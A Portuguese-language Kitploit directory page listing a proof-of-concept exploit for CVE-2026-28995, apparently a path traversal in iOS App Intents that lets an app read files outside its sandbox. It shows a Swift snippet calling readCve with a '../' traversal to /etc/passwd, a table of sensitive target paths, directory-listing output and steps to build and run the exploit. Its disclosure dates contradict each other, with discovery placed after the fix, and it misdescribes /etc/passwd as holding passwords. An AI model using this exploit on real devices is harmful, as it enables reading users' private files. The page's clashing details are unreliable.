Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-28995 — # CVE-2026-28995 Prova de Conceito para CVE-2026-28995 — Vulnerabilidade de Path Traversal no App Intents em iOS 26.4.2 e versões anteriores. | Kitploit
Ferramentas/GitHubGitHub/robertmak2014-sudow/cve-2026-28995
Segurança iOSAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança Móvel
GitHubrobertmak2014-sudow/cve-2026-28995

CVE-2026-28995

# CVE-2026-28995 Prova de Conceito para CVE-2026-28995 — Vulnerabilidade de Path Traversal no App Intents em iOS 26.4.2 e versões anteriores.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
424há 2 mesesAinda não revisado
Compartilhar

CVE-2026-28995

Prova de Conceito para CVE-2026-28995 — Vulnerabilidade de Path Traversal no App Intents no iOS 26.4.2 e anteriores.

Descrição

Esta vulnerabilidade permite que um aplicativo malicioso leia qualquer arquivo fora de sua sandbox por meio do App Intents. A causa raiz é a validação insuficiente de caminho no framework App Intents da Apple.

Versões afetadas: iOS 26.4.2 e anteriores
Corrigido em: iOS 26.5 (11 de maio de 2026)

Uso

1. Função readCve(path: String) -> String

root@kitploit:~
let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
  1. Exemplos de Caminhos

Caminho Lê ../../../../../../../../../../../../../etc/passwd Senhas dos usuários ../../../../../../../../../../../../../etc/hosts Arquivo hosts ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist Preferências do sistema

  1. Tratamento de Diretórios

Se o caminho apontar para um diretório, a função retorna:

root@kitploit:~
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/

Como Executar

  • Crie um projeto iOS no Xcode.
  • Adicione CVE-2026-28995.swift ao projeto.
  • Chame readCve(path:) com o caminho alvo.
  • Execute no iOS 26.4.2 ou anterior.

Divulgação Responsável

Descoberta: 1º de julho de 2026
Corrigida em: iOS 26.5 (11 de maio de 2026)

Baixar ferramenta